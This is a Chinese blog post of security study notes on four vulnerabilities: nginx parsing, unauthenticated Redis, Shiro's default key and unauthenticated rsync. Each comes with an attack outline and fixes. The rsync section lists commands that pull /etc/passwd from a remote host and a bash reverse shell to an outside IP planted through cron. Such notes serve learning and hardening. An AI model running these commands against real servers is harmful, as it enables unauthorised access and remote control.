2022-10-06(nginx解析漏洞、Redis 4.x/5.x 未授权访问漏洞、Shiro 默认密钥、rsync未授权访问)

已于 2022-10-08 13:20:04 修改
阅读量1.8k 收藏
点赞数 1
分类专栏: 笔记 文章标签: nginx redis php
于 2022-10-06 22:58:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45751902/article/details/127180682
版权

文章目录

1.nginx解析漏洞

原理:

由于Nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://liuwx.cn/test.png/.php (url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如’a.php’),(其中test.png是我们上传的包含PHP代码的照片文件),test.png/.php可能会被当作php代码执行

对低版本的Nginx(Nginx0.5,0.6以及0.7 ⇐ 0.7.65,0.8 ⇐ 0.8.37)可以在任意文件名后面添加%00.php进行解析攻击
例:
http://www.xxx.com/xx.jpg%00.php中会将xx.jpg当作php文件解析

攻击的前提是
cgi.fix_pathinfo=1,该值是默认为1,表示开启,位置/etc/php5/fpm/php.ini
对文件路径进行修理,当php文件不存在时,会找上一级,进行解析,如果还是找不到,继续找,http://liuwx.cn/test.png/.php,这个就是找png进行解析

http://www.xxx.com/1.jpg/a.php

在这里插入图片描述
修复后的页面是
在这里插入图片描述

修复:

  • 将php.ini文件中的cgi.fix_pathinfo的值设为0。这样php在解析1.jpg/1.php这样的目录时,只要1.php不存在就会显示404。

  • 将/etc/php5/fpm/pool.d/www.conf中security.limit_extensions后面的值设为.php。只解析后缀是php

Redis 4.x/5.x 未授权访问漏洞

漏洞产生原因

Redis默认使用6379端口,并且Redis默认是空密码并且默认允许远程连接。一些管理员在安装好Redis之后,并没有修改它的默认端口。而且也没有设置密码的话,黑客就可以通过Redis数据库写入任意文件进行提权,从而操控该服务器。

Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令

利用漏洞的三种方法

  1. 写shell
  2. 写计划任务反弹shell
  3. 导入ssh密钥

详细利用

加固

  • 更新服务至最新版本,完成漏洞的修复
  • 添加防火墙规则避免非信任ip访问
  • 设置密码,不要太简单了
  • 更改端口

Shiro 默认密钥

Apache Shiro默认使用了CookieRememberMeManager,用户登录成功后会生成经过加密并编码的cookie,cookie解码的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码(硬编码数据通常只能通过编辑源代码和重新编译可执行文件来修改)的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。
payload产生的过程:
命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值

低版本rememberMe=deleteMe
在这里插入图片描述

1.8.0版本,尝试访问系统进行登录,抓包获取参数特征,包含xxx_rememberMe=deleteMe字段
在这里插入图片描述
注意
Shiro1.4.2版本后Shiro的加密模式由AES-CBC更换为 AES-GCM,Shiro高版本下的漏洞利用,就需要考虑加密模式变化的情况。另外,这里cookie传递的参数是自定义的,而不是常见的rememberMe,这也是需要注意的地方。

修复

  • 升级shiro至最新版本
  • 一定要注意生成新的密钥替换

rsync未授权访问

rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件

判断:rsync rsync://123.58.224.8:40894/
利用:
-读取文件:rsync rsync://123.58.224.8:40894/src/
-下载文件:rsync rsync://123.58.224.8:12018/src/etc/passwd ./
-上传文件:rsync -av passwd rsync://123.58.224.8:40894/src/tmp/passwd
查看/tmp目录里的文件,后面有`/`
rsync rsync://123.58.224.8:40894/src/tmp/

出现下面这样的就是有漏洞
在这里插入图片描述
还可以将定时任务传到/src/etc/cron.hourly
例如:
将下面的反弹写入定时任务里

#!/bin/bash 
/bin/bash -i >& /dev/tcp/47.94.236.117/5566 0>&1
chmod +x shell

修复

  • 正确配置认证用户名或者密码
  • 使用足够但最小权限
  • host allow/deny 来控制接入源IP
  • 可以配置只读
  • 非必要应该仅限制配置路径下可访问

参考文章

Nginx文件解析漏洞
Nginx-解析漏洞
Shiro高版本默认密钥的漏洞利用
vulhub之rsync未授权访问漏洞复现&利用

空白行
关注
专栏目录
红队攻防渗透技术实战流程:红队资产信息收集之单个目标信息收集
HACKONE的博客
03-25 979
根据目标网站的大小确定数据库类型首先,成本上的差距,access是不要钱的,mysql也是开源的,sql server 是收费的一般也就几千,Oracle的费用则数万。C段指的是同一内网段内的其他服务器,每个IP有ABCD四个段,举个例子,192.168.0.1,A段就是192,B段是168,C段是0,D段是1,而C段嗅探的意思就是拿下它同一C段中的其中一台服务器,也就是说是D段1-255中的一台服务器,然后利用工具嗅探拿下该服务器。有时候网站的响应包会携带server信息,如下,这种情况多存在内网中。
关于服务器nginx权限被拒绝
发果叁
10-11 2893
我这种吸引bug的体质,不配顺顺利利完成任务、服务器的问题在最开始上班时,windows环境下经常最头疼的就是服务器环境的预装上线,常常因为这个问题搞到1点多,但那会羁绊少,怀着学习和对事儿的认真,再加上一块和组员和领导搓一顿,幸福感满满。其后也带过很多人,合作过许多人、形形色色的,慢慢的发现越往后入行的很多人害怕环境部署,害怕出问题,所以拒绝去尝试部署。动辄就是“福报”和“PUA”
Nginx漏洞授权访问和源码泄漏漏洞处理
2401_85117752的博客
06-04 514
完成后,配置要单点的应用程序。保存成功后,设置初始密码,点击 Credentials,其中Temporary 处点击为 OFF,完成密码重置。然后重新配置grafana的CSS,修改成本地的地址,比如:/public/css/hotline.css。**开源地址:https://docs.qq.com/doc/DSmxTbFJ1cmN1R2dB **#优化css加载速度。
远程访问安全:rsync、ProFTPD、OpenSSH和VNC漏洞分析
最新发布
2301_80064376的博客
08-15 2467
ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。任何经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。
Shiro授权页面
m0_67401499的博客
03-28 538
今天在整合shiro的时候发现,在shiro的过滤器里面配置授权的跳转页面是无效的 <property name="unauthorizedUrl" value="/unauthorized.jsp"></property> 解决方案1 需要在springMVC的配置文件配置异常的映射解析器。当出现某个异常时跳转到相应的页面。比如下面第一个授权的异常就跳转到你配置的视图解析器前缀+unauthorized+后缀 一般都是/WEB-INF/view/unauthorized.js
CVE-2020-1957--Shiro授权访问
qq_44880255的博客
08-12 1499
参考链接:https://www.cnblogs.com/backlion/p/14055274.html 1、影响版本 Apache Shiro < 1.5.2 2、漏洞原因 Shiro框架通过拦截器功能来对用户访问权限进行控制,如anon, authc等拦截器。anon为匿名拦截器,不需要登录即可访问;authc为登录拦截器,需要登录才可以访问Shiro的URL路径表达式为Ant格式,路径通配符*表示匹配零个或多个字符串,/*可以匹配/hello,但是匹配不到/hello/,因为*通配符无法
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1339
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Kali安装vulhub漏洞环境
xgchenghai的博客
05-23 2333
在费劲地搞定vulapps环境安装后,对安装漏洞环境貌似上瘾了,再装一个vulhub漏洞环境吧。 这次就继续在kali2009上安装,希望一切顺利。 1、简介 Vulhub是一个面向大众的开源漏洞靶场,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。安装 docker和 docker-compose后即可开始使用vulhub。 项目地址: https://github.com/vulhub/vulhub 2、安装过程 安装过程记录如下: #需要pip root@kali:/# apt-.
【评论区抽奖】北大社将《Web安全攻防从入门到精通》送上新书热卖NO.1
hongrisec的博客
10-17 1818
还没看到《Web安全攻防从入门到精通》?那你的第一本安全书籍就交给红日吧,评论区留言,免费看!
螣龙安科笔记:内网渗透测试(三)
katekatezzzzz的博客
05-27 1495
经过前两篇文章的介绍,相信大家对于内网渗透测试的一些基础知识已经有了足够的了解,这篇文章就将带你一起来了解内网渗透测试的全过程。 (四)内网渗透流程 1.渗透工具准备 1.1扫描工具 1.1.1主动扫描工具 web应用漏洞扫描器:用于web项目的安全测试工具,扫描网站所有url,自动测试是否存在各种类型的漏洞。如:AWVS、appscan 综合漏洞扫描器:集合了多种功能的漏洞扫描器。如Fux iscanner,具有如下功能:漏洞检测和管理,验证测试程序,IT资产发现和管理,端口扫描器,子域扫描器
nginx-1.13.3,nginx1.13.3不存在信息泄漏漏洞安全稳定nginx版本
10-09
亲测好用.nginx-1.13.3,nginx1.13.3不存在信息泄漏漏洞安全稳定nginx版本,不存在漏洞 nginx-1.13.3 nginx1.13.3 安全稳定 nginx版本
其他的 框架安全:Apache Shiro 漏洞序列.(CVE-2016-2807)
网络安全领域___专研者.
05-12 624
Apache Shiro 是一个强大且易用的Java安全框架,它为应用程序提供了身份验证、授权、加密和会话管理等常见的安全功能。漏洞大多会发生在登录处,返回包里包含remeberMe=deleteMe字段。
shiro框架下,用户访问接口没有权限,会有什么报错
weixin_42759398的博客
04-09 518
弟子,Shiro是一个安全框架,本身提供了默认的配置来支持安全功能,其中就包括访问控制的配置。在使用Shiro时,您可以通过配置Realm实现权限验证,并使用Shiro提供的注解,如@RequiresPermissions("user:add")来标识访问权限。因此,在使用Shiro时,您只需要在配置文件中指定Realm和相应的权限验证规则,不需要额外配置权限不足的错误信息,Shiro会自动处理。
记一次使用shiro-redis开源插件中遇到的坑
m0_67403073的博客
08-31 365
大致意思是principal对象中必须要有authCacheKey或者id属性,且要有其对应的get方法。我特意去检查了下,我的loginBean中是有id属性的,但是是继承自父类的属性,问题就出在这里,应该我当时用的版本(3.1.0)是没有考虑到从父类去读取id属性的情况,把版本换成3.2.3立马就可以了(作者也在github中说过不要使用3.1.0以下版本,怪我自己没去注意)...
shiro 内存马_shiro-redis引起的内存泄漏问题分析
weixin_39616379的博客
12-22 781
最近一个系统运行一周左右开始响应变慢,初步判断可能是内存泄漏造成频繁GC造成。经过分析DUMP文件后发现内存中存在大量的SessionInMemory对象。每个线程中有上百个乃至上千个SessionInMemory对象存储在ThreadLocal中。经过源代码的分析,基本可以断定该问题是shiro-redis造成的,以下是问题代码RedisSessionDAO.javaprivateSessio...
第三方库shiro-redis所引起的内存泄露问题分析OOM
xc2011的博客
05-05 552
2)getSessionFromThreadLocal()方法获取session的时候,顺便检查其他session是否超时,如果超时则移除掉,避免session的不断累积。源码,有需要的童鞋可以动手实现一下,但注意session很多时,采用检查、删除的方式可能也会有一定性能损耗,需要实际压测权衡一下哪种方案更好。线上某系统运行不到一周,响应速度变慢,并且多次重启,排查时发现CPU占用到100%,但这段时间系统并发量并改变,数据库、缓存等也没发现异常。然后进一步往下追,可以看到出问题的地方是。
Shiro 550、721
hjseo_seg的博客
03-28 4224
Apache Shiro 是一个功能强大且易于使用的 Java 安全框架,它用于处理身份验证,授权,加密和会话管理 在默认情况下 , Apache Shiro 使用 CookieRememberMeManager 对用户身份进行序列化/反序列化 , 加密/解密和编码/解码 , 以供以后检索 . 因此 , 当 Apache Shiro 接收到经身份验证的用户请求时 , 会执行以下操作来寻找他们被记住的身份. 从请求数据包中提取 Cookie 中 rememberMe 字段的值,对提取的 Cookie 值进
nginx 解决X-Frame-Options Header配置漏洞
08-27
对于配置 X-Frame-Options Header 导致的漏洞,可以通过配置 Nginx 来解决。 首先,确保你已经安装了 Nginx,并且有权限编辑配置文件。 接下来,打开 Nginx 的配置文件(一般位于 /etc/nginx/nginx.conf 或 /etc/nginx/conf.d/default.conf)。 在 server 或 location 块中,添加以下代码来设置 X-Frame-Options Header: ``` add_header X-Frame-Options "SAMEORIGIN"; ``` 这将设置 X-Frame-Options Header 为 SAMEORIGIN,表示该页面只能在相同的域名下的页面中嵌套展示。 如果你希望完全禁止页面被嵌套,可以使用以下代码: ``` add_header X-Frame-Options "DENY"; ``` 保存配置文件并重新加载 Nginx。 此时,Nginx 已经配置了 X-Frame-Options Header,可以防止跨域嵌套攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值